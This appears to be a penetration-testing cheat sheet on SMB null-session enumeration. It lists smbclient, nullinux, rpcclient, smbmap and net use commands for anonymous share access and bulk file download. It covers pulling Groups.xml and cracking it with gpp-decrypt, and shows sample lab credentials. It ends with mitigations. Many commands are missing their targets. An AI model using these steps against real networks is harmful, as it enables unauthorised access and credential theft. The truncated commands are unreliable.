
  • smbclient –help

2. Connect

  • smbclient -L \\

3. Null session

  • smbclient \\\\\\ipc$
  • help

4. Log in as anonymous

  • smbclient -L // -U anonymous


Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.

If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted.

1. Download the tool

  • git clone

2. Run the install script

  • cd nullinux
  • ls
  • sudo bash

3. Install python modules (in this case I needed ipparser)

  • sudo pip3 install ipparser

4. Run the tool, help menu

-h, –help = show this help message and exit

  • python3 -h

5. Basic scan

  • python3

6. Using Credentials can give us more information



  • python3 -u james -p J@m3s_P@ssW0rd!


SMB – Null Session

Net BIOS null Sessions occurs when you connect any remote system without user-name and password. It is usually found in systems with Common Internet File System (CIFS) or Server Message Block (SMB) depending on operating system.

By default null sessions are enabled in Windows 2000 and Windows NT. Actually it is also enabled by default in Windows XP and Windows 2003 Server but they don’t allow enumeration of user accounts.

Null session functionality within the SMB protocol, Null Sessions are a ‘feature’ of Windows allowing an anonymous user to connect to the IPC$ share and enumerate certain information.

Some of these shares allow one to access the complete storage device on remote systems. For example, C$ will allow one to access the C Drive. Another share, Admin$, allows one to access the Windows installation directory. Folders followed by “$” are hidden.

IPC$ is a special share that is used to facilitate inter-process communication (IPC). That is, it doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.



  • net use \\IP_ADDRESS\ipc$ “” /user:””
  • net use \\\ipc$ /u:”” “”
  • <enter>
  • net use
  • net view \\


  • rpcclient -U “” IP_ADDRESS
  • <enter>


  • smbclient -L //<IP ADDRESS>
  • <enter>

  • smbclient //
  • recurse ON
  • prompt OFF
  • mget *

This one is used to download all the files from the share, when anonymous log in is enabled.

As an example you could get Groups.xml (deprecated on newer windows 2012, 2016)

gpp-decrypt is used against the hash


1. SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

  • smbmap -H

2. Use SMB client to login to the file share that you show any permission READ/WRITE, use a fake user if it fails to connect

  • smbmap -u <any user> -H <IP ADDRESS>

3. This one below shows recursive listing. Letting us through the share files.

  • smbmap -R <Replication> -H -A <Groups.xml> -q
  • smbmap -R -H

4. This one is for finding a file, if matches, it downloads it.

  • smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H

Using credentials, we may find more permissions.

While connected here are some interesting commands:

‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’, ‘querydominfo’, “netsharegetinfo”, “srvinfo”, “getdompwinfo”, “enumdomgroups”, “querygroup”, “queryuser”, “lookupnames”, “queryaliasmem”, “querygroupmem”, “lookupsids”

Mounting the share to reveal the contents:

1. Create a directory to mount

  • mkdir /mnt/smb

2. mount it

  • mount -t cifs //<IP ADDRESS>/Backups /mnt/smb
  • <enter>

3. show it mounted

  • ls -lR /mnt/smb



1. rpcbind

2. net use (windows)

3. enum4linux

4. nmap

5. nbtstat (windows)

6. Nmblookup

7. metasploit


1. Winfo:

  • Windows domain to which the system belongs
  • Security policy settings
  • Local usernames
  • Drive shares

2. DumpSec:

3. Netusers:

  • Abused account privileges
  • Users currently logged into the system



This vulnerability can be mitigated by setting the DWORD value ‘RestrictAnonymous’ to 1 in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA

Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:

  1. 139 (NetBIOS sessions services)
  2. 445 (runs SMB over TCP/IP without NetBIOS)

Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine’s network connection for those systems that don’t need it.
